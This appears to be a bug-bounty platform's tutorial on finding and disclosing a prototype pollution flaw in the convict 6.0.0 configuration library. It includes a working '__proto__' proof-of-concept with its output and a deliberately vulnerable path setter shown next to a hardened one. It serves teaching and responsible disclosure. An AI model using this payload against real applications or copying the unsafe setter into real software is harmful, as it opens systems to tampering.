Submitting your first vulnerability disclosure

Finding and disclosing a vulnerability in an open source repository can be daunting. To get you started, we have put together a simple walkthrough that takes you from installing a vulnerable package to submitting your first report with huntr.

Walkthrough

In our walkthrough, we will take a look at a Prototype Pollution vulnerability in mozilla/node-convict, a configuration-management library maintained by Mozilla. The vulnerability was found, disclosed and patched by our community. If you want to skip the walkthrough and go straight to the patch, click here.

Installing a package

First, we want to install the vulnerable version of the package from our terminal. If you have Node.js on your computer, you can install it with npm:

$ npm install convict@6.0.0 # vulnerable version

If you have any trouble with this step, please read here.

Create a proof-of-concept

Now that you have the vulnerable package installed, create a proof-of-concept in the same directory where you installed it (so that `require('convict')` resolves to the 6.0.0 copy in node_modules). You can call it poc.js (a JavaScript file):

const convict = require('convict'); // import the vulnerable package
const schema = {};                  // an empty configuration schema
const config = convict(schema);     // build a config object from it

// A fresh object literal has no own property "polluted", and at this point
// nothing up its prototype chain has one either.
console.log('Before : ' + {}.polluted);

// The dotted path is split on "." and walked segment by segment; the
// "__proto__" segment reaches Object.prototype, so the last segment is
// written onto the prototype shared by every object in the process.
config.set('__proto__.polluted', 'Yes! Its Polluted');

// A brand-new object literal now inherits the value through its prototype.
console.log('After : ' + {}.polluted);

Execute the proof-of-concept

Now that you have created your proof-of-concept, you can execute it with:

node ./poc.js # Run the proof-of-concept

Check the result

In your terminal, you should now see the result of your proof-of-concept:

Before : undefined
After : Yes! Its Polluted

You have now demonstrated a prototype pollution: the second `{}` is a brand-new object that was never touched by your code, yet it reports a `polluted` property, because the write landed on `Object.prototype` and is therefore visible to every object in the Node.js process. If you want to see the fix for this vulnerability, click here.
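To make the mechanism concrete, the following is an added example written for this walkthrough; it is not convict's code and not the project's patch. It contains a deliberately minimal dotted-path setter (`setPathUnsafe`) that shows the bug class, a hardened variant (`setPathSafe`) that rejects the reserved keys `__proto__`, `constructor` and `prototype` and only descends into own properties, and a small `demo` helper that runs the page's payload against each setter, checks whether `Object.prototype` was polluted, and then removes the key so one run does not contaminate the next. All function names here are ours, chosen for illustration.

```javascript
'use strict';

// Vulnerable: splits the path on "." and creates or descends into each
// segment without checking whether the segment names a prototype-reaching key.
function setPathUnsafe(target, path, value) {
  const parts = path.split('.');
  let node = target;
  for (let i = 0; i < parts.length - 1; i++) {
    const key = parts[i];
    if (typeof node[key] !== 'object' || node[key] === null) {
      node[key] = {};
    }
    node = node[key]; // when key === '__proto__' this is Object.prototype
  }
  node[parts[parts.length - 1]] = value;
  return target;
}

// Keys that let a dotted path escape the target object and reach a shared
// prototype ("constructor" reaches Function.prototype / Object via .prototype).
const RESERVED_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

// Hardened: rejects any reserved segment up front and only walks through
// properties the current node actually owns, never inherited ones.
function setPathSafe(target, path, value) {
  const parts = path.split('.');
  for (const key of parts) {
    if (RESERVED_KEYS.has(key)) {
      throw new Error('refusing to set path containing reserved key "' + key + '"');
    }
  }
  let node = target;
  for (let i = 0; i < parts.length - 1; i++) {
    const key = parts[i];
    const own = Object.prototype.hasOwnProperty.call(node, key);
    if (!own || typeof node[key] !== 'object' || node[key] === null) {
      node[key] = {};
    }
    node = node[key];
  }
  node[parts[parts.length - 1]] = value;
  return target;
}

// True if Object.prototype itself has acquired an own property of that name,
// which is the definitive test that pollution happened (not just inheritance).
function isPolluted(name) {
  return Object.prototype.hasOwnProperty.call(Object.prototype, name);
}

// Run the walkthrough's payload shape ("__proto__.<key>") against a setter,
// record whether it threw and whether Object.prototype was polluted, then
// clean up so the global prototype is left as we found it.
function demo(setter, key) {
  let threw = false;
  try {
    setter({}, '__proto__.' + key, 'Yes! Its Polluted');
  } catch (e) {
    threw = true;
  }
  const polluted = isPolluted(key);
  delete Object.prototype[key];
  return { threw: threw, polluted: polluted };
}

console.log('unsafe setter:', demo(setPathUnsafe, 'polluted'));
console.log('safe setter  :', demo(setPathSafe, 'polluted'));
```

Running it shows `{ threw: false, polluted: true }` for the unsafe setter and `{ threw: true, polluted: false }` for the hardened one. Two points worth keeping in mind when you write your own proof-of-concept: test with `Object.prototype.hasOwnProperty.call(Object.prototype, name)` rather than only `{}.name`, since the latter also reads properties a test harness may have legitimately defined, and delete the polluted key afterwards if the same process runs other checks.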

Conclusion

It is now time for you to find your first Prototype Pollution vulnerability. By following a similar workflow with a different package (look for functions that split a user-controlled key path on "." or merge untrusted objects recursively), you can spot your first vulnerability and disclose it with our form. Before you submit, confirm that the latest published version is still affected and that the issue has not already been reported.

If you found this walkthrough helpful or have any feedback, we would love to hear your thoughts on our Twitter.
